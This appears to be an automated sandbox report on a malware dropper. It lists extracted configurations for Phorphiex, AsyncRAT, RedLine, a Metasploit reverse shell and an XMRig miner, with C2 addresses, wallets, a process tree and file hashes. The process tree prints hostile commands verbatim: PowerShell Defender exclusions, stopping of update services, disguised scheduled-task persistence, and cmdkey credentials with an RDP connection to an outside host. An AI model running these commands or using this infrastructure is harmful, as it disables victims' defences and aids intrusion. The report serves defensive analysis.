Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    28-10-2024 19:02

General

  • Target

    4363463463464363463463463.exe(3).exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

phorphiex

C2

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9

AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z

LTK4xdKPAgFHPLan8kriAD7eY4heyy73mB

MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q

4BB7ckkaPTyADc8trtuwDoZxywaR4eNL5cDJ3KBjq9GraN4mUFztf7mLS7WgT7Bh7uPqpjvA4ypVwXKCJ1vvLWWAFvSmDoD

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3ESHude8zUHksQg1h6hHmzY79BS36L91Yn

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2

bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr

bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd

Attributes
  • mutex

    l9ll8dd6x

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

0.tcp.eu.ngrok.io:15174

Mutex

aNoM7pvDUvoo

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

redline

C2

38.180.72.54:42814

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

34.124.148.215:4444

Extracted

Family

redline

Botnet

Miles

C2

194.49.94.43:3251

Attributes
  • auth_value

    e9df05a4c476aa612a10a6f3fc79043d

Extracted

Family

phorphiex

C2

http://185.215.113.84

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Modifies security service 2 TTPs 2 IoCs
  • Phorphiex family
  • Phorphiex payload 4 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • Redline family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Windows security bypass 2 TTPs 12 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 1 IoCs
  • XMRig Miner payload 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 37 IoCs
  • Windows security modification 2 TTPs 14 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 13 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 32 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 18 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 28 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1212
      • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe(3).exe
        "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe(3).exe"
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3060
        • C:\Users\Admin\AppData\Local\Temp\Files\r.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\r.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2996
          • C:\Windows\sysvplervcs.exe
            C:\Windows\sysvplervcs.exe
            4⤵
            • Modifies security service
            • Windows security bypass
            • Executes dropped EXE
            • Loads dropped DLL
            • Windows security modification
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2780
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2764
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:804
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2012
              • C:\Windows\SysWOW64\sc.exe
                sc stop UsoSvc
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2572
              • C:\Windows\SysWOW64\sc.exe
                sc stop WaaSMedicSvc
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2188
              • C:\Windows\SysWOW64\sc.exe
                sc stop wuauserv
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2320
              • C:\Windows\SysWOW64\sc.exe
                sc stop DoSvc
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2792
              • C:\Windows\SysWOW64\sc.exe
                sc stop BITS /wait
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2516
            • C:\Users\Admin\AppData\Local\Temp\186279201.exe
              C:\Users\Admin\AppData\Local\Temp\186279201.exe
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2320
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                6⤵
                  PID:2992
                  • C:\Windows\system32\reg.exe
                    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                    7⤵
                      PID:1516
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                    6⤵
                      PID:1996
                      • C:\Windows\system32\schtasks.exe
                        schtasks /delete /f /tn "Windows Upgrade Manager"
                        7⤵
                          PID:892
                    • C:\Users\Admin\AppData\Local\Temp\240433249.exe
                      C:\Users\Admin\AppData\Local\Temp\240433249.exe
                      5⤵
                      • Executes dropped EXE
                      PID:808
                    • C:\Users\Admin\AppData\Local\Temp\2476224829.exe
                      C:\Users\Admin\AppData\Local\Temp\2476224829.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:1920
                      • C:\Users\Admin\AppData\Local\Temp\2408218232.exe
                        C:\Users\Admin\AppData\Local\Temp\2408218232.exe
                        6⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2444
                    • C:\Users\Admin\AppData\Local\Temp\592416158.exe
                      C:\Users\Admin\AppData\Local\Temp\592416158.exe
                      5⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:1964
                • C:\Users\Admin\AppData\Local\Temp\Files\newfile.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\newfile.exe"
                  3⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2540
                • C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:864
                • C:\Users\Admin\AppData\Local\Temp\Files\new1.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\new1.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Modifies system certificate store
                  PID:2652
                • C:\Users\Admin\AppData\Local\Temp\Files\ss.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\ss.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1992
                • C:\Users\Admin\AppData\Local\Temp\Files\Miles.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\Miles.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2792
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 512
                    4⤵
                    • Loads dropped DLL
                    • Program crash
                    PID:1112
                • C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
                  3⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:2136
                  • C:\Windows\sysklnorbcv.exe
                    C:\Windows\sysklnorbcv.exe
                    4⤵
                    • Modifies security service
                    • Windows security bypass
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Windows security modification
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: SetClipboardViewer
                    PID:2924
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:2624
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2364
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:1068
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop UsoSvc
                        6⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:2444
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop WaaSMedicSvc
                        6⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:1668
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop wuauserv
                        6⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:2604
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop DoSvc
                        6⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:2068
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop BITS
                        6⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:1928
                    • C:\Users\Admin\AppData\Local\Temp\278213165.exe
                      C:\Users\Admin\AppData\Local\Temp\278213165.exe
                      5⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2400
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                        6⤵
                          PID:952
                          • C:\Windows\system32\reg.exe
                            reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                            7⤵
                              PID:1496
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                            6⤵
                              PID:2368
                              • C:\Windows\system32\schtasks.exe
                                schtasks /delete /f /tn "Windows Upgrade Manager"
                                7⤵
                                  PID:2440
                            • C:\Users\Admin\AppData\Local\Temp\85784441.exe
                              C:\Users\Admin\AppData\Local\Temp\85784441.exe
                              5⤵
                              • Executes dropped EXE
                              PID:572
                            • C:\Users\Admin\AppData\Local\Temp\1705128845.exe
                              C:\Users\Admin\AppData\Local\Temp\1705128845.exe
                              5⤵
                              • Executes dropped EXE
                              PID:1764
                            • C:\Users\Admin\AppData\Local\Temp\2284720121.exe
                              C:\Users\Admin\AppData\Local\Temp\2284720121.exe
                              5⤵
                              • Executes dropped EXE
                              PID:1628
                        • C:\Users\Admin\AppData\Local\Temp\Files\networks_profile.exe
                          "C:\Users\Admin\AppData\Local\Temp\Files\networks_profile.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:2076
                          • C:\Users\Admin\AppData\Local\Temp\Files\networks_profile.exe
                            "C:\Users\Admin\AppData\Local\Temp\Files\networks_profile.exe"
                            4⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:2868
                        • C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe
                          "C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe"
                          3⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SetWindowsHookEx
                          PID:2948
                        • C:\Users\Admin\AppData\Local\Temp\Files\11.exe
                          "C:\Users\Admin\AppData\Local\Temp\Files\11.exe"
                          3⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          PID:2740
                          • C:\Windows\sysarddrvs.exe
                            C:\Windows\sysarddrvs.exe
                            4⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:1052
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              5⤵
                                PID:1928
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                  6⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:1116
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                                5⤵
                                  PID:2068
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc stop UsoSvc
                                    6⤵
                                    • Launches sc.exe
                                    PID:2600
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc stop WaaSMedicSvc
                                    6⤵
                                    • Launches sc.exe
                                    PID:2364
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc stop wuauserv
                                    6⤵
                                    • Launches sc.exe
                                    PID:1516
                            • C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe
                              "C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"
                              3⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:2420
                            • C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe
                              "C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe"
                              3⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:2844
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\30.tmp\31.tmp\32.bat C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe"
                                4⤵
                                  PID:1664
                                  • C:\Windows\system32\cmdkey.exe
                                    cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"
                                    5⤵
                                      PID:3016
                                    • C:\Windows\system32\mstsc.exe
                                      mstsc /v: 211.168.94.177
                                      5⤵
                                      • Enumerates connected drives
                                      • Suspicious behavior: AddClipboardFormatListener
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2092
                                • C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1716
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                2⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2408
                                • C:\Windows\system32\schtasks.exe
                                  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
                                  3⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2428
                              • C:\Windows\System32\schtasks.exe
                                C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                2⤵
                                  PID:788
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Drops file in System32 directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1940
                                  • C:\Windows\system32\schtasks.exe
                                    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
                                    3⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2676
                                • C:\Windows\System32\conhost.exe
                                  C:\Windows\System32\conhost.exe
                                  2⤵
                                    PID:1016
                                  • C:\Windows\System32\dwm.exe
                                    C:\Windows\System32\dwm.exe
                                    2⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:2044
                                • C:\Windows\system32\taskeng.exe
                                  taskeng.exe {787600AD-1482-4775-AF44-C44AFE3021E3} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
                                  1⤵
                                  • Loads dropped DLL
                                  PID:544
                                  • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                    "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                    2⤵
                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2772

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                  Filesize

                                  342B

                                  MD5

                                  21ea69d7ca5912646ddb009d6c8925a2

                                  SHA1

                                  3bed96fbc8d44da403238f346bd21dc7c8af7f75

                                  SHA256

                                  5e011202bb6eb9053d7447dbf640b90b0406a572ac4c70164ea486f9c7bdd0c0

                                  SHA512

                                  85ad7d25a96573ec8bef2033659b97e7c179084b8a97f739bb49a311ae3e64da8680fed91724fe72c806d554f216547a7129bf98eb002ea0ea1f8a91c6dc6eeb

                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                  Filesize

                                  342B

                                  MD5

                                  2d94b4cfb04834f6d17eb600df27883f

                                  SHA1

                                  a2b6b86ad772dda2d5b1ef1dcfc5910a3269bb29

                                  SHA256

                                  18f1811899f9765c6cf02a24ef7afc91e235fce40f2b612c0d9558b03bbdf7e5

                                  SHA512

                                  77256ac500663557a0eb723d2d36ae91c63a179001f42b20e0d646e39bd83f66dd797cc1f2f1da77022364a90bf82c85438af7bc7a38a02584cbcb871f875d36

                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                  Filesize

                                  342B

                                  MD5

                                  03a8364d6d40eb5fe248179e51a65605

                                  SHA1

                                  85ba26f725dc80d91cc4d36dfd2327abbdbc107e

                                  SHA256

                                  4ab0329b28ae0a6312fc2dd6efb646151d28c7ea861fb8d2d3d5a1194afef60f

                                  SHA512

                                  8bae65057fabd5034387c696294d00f498b4c92ff229ccbeeeb16e3f5460fb4ac68e22e2594c1dccf0efa6e21afbd7db942ad6777318bfadecf8513fc4952b15

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6G4X5UFP\1[1]

                                  Filesize

                                  108KB

                                  MD5

                                  1fcb78fb6cf9720e9d9494c42142d885

                                  SHA1

                                  fef9c2e728ab9d56ce9ed28934b3182b6f1d5379

                                  SHA256

                                  84652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02

                                  SHA512

                                  cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3

                                • C:\Users\Admin\AppData\Local\Temp\CabCBD9.tmp

                                  Filesize

                                  70KB

                                  MD5

                                  49aebf8cbd62d92ac215b2923fb1b9f5

                                  SHA1

                                  1723be06719828dda65ad804298d0431f6aff976

                                  SHA256

                                  b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                  SHA512

                                  bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                • C:\Users\Admin\AppData\Local\Temp\Files\11.exe

                                  Filesize

                                  79KB

                                  MD5

                                  e2e3268f813a0c5128ff8347cbaa58c8

                                  SHA1

                                  4952cbfbdec300c048808d79ee431972b8a7ba84

                                  SHA256

                                  d8b83f78ed905a7948e2e1e371f0f905bcaaabbb314c692fee408a454f8338a3

                                  SHA512

                                  cb5aeda8378a9a5470f33f2b70c22e77d2df97b162ba953eb16da085b3c434be31a5997eac11501db0cb612cdb30fa9045719fcd10c7227c56cc782558e0c3bc

                                • C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe

                                  Filesize

                                  114KB

                                  MD5

                                  a474faa2f1046fbab4c3ad1e3a26097e

                                  SHA1

                                  aa526b2583dd9b72dd4ae2549189c6631f8486c2

                                  SHA256

                                  391233a33e1e163875616a8c1564ec8597b630ffcbb4b123c5cfb5b5d3eeea8b

                                  SHA512

                                  947f248d1e7c7c897a9b508607611bb69fa3a9ac1d8b5a0e0343e955a7d6dd235408d086bdf2ec4e9f15e30c1f082b9980144f6de7eebf95e71719c5e1e7040b

                                • C:\Users\Admin\AppData\Local\Temp\Files\r.exe

                                  Filesize

                                  96KB

                                  MD5

                                  930c41bc0c20865af61a95bcf0c3b289

                                  SHA1

                                  cecf37c3b6c76d9a79dd2a97cfc518621a6ac924

                                  SHA256

                                  1f2e9724dfb091059ae16c305601e21d64b5308df76ddef6b394573e576ef1ff

                                  SHA512

                                  fa1f33c71da608b3980038981220fcebee0b0cc44331e52f5198dd2761c97631ee8286756c2cc16245a1370c83bb53cc8ea8ef64e0fcdd30af51f023973986b2

                                • C:\Users\Admin\AppData\Local\Temp\Files\t1.exe

                                  Filesize

                                  84KB

                                  MD5

                                  a775d164cf76e9a9ff6afd7eb1e3ab2e

                                  SHA1

                                  0b390cd5a44a64296b592360b6b74ac66fb26026

                                  SHA256

                                  794ba0b949b2144057a1b68752d8fa324f1a211afc2231328be82d17f9308979

                                  SHA512

                                  80b2d105d2fac2e56b7ea9e1b56057e94ffe594c314ea96668d387ab120b24be580c58d68d37aca07273d3ce80f0d74f072102469f35cb02e2295817e1f16808

                                • C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe

                                  Filesize

                                  83KB

                                  MD5

                                  06560b5e92d704395bc6dae58bc7e794

                                  SHA1

                                  fbd3e4ae28620197d1f02bfc24adaf4ddacd2372

                                  SHA256

                                  9eaaadf3857e4a3e83f4f78d96ab185213b6528c8e470807f9d16035daadf33d

                                  SHA512

                                  b55b49fc1bd526c47d88fcf8a20fcaed900bfb291f2e3e1186ec196a87127ed24df71385ae04fedcc802c362c4ebf38edfc182013febf4496ddeb66ce5195ee3

                                • C:\Users\Admin\AppData\Local\Temp\TarCBEC.tmp

                                  Filesize

                                  181KB

                                  MD5

                                  4ea6026cf93ec6338144661bf1202cd1

                                  SHA1

                                  a1dec9044f750ad887935a01430bf49322fbdcb7

                                  SHA256

                                  8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                  SHA512

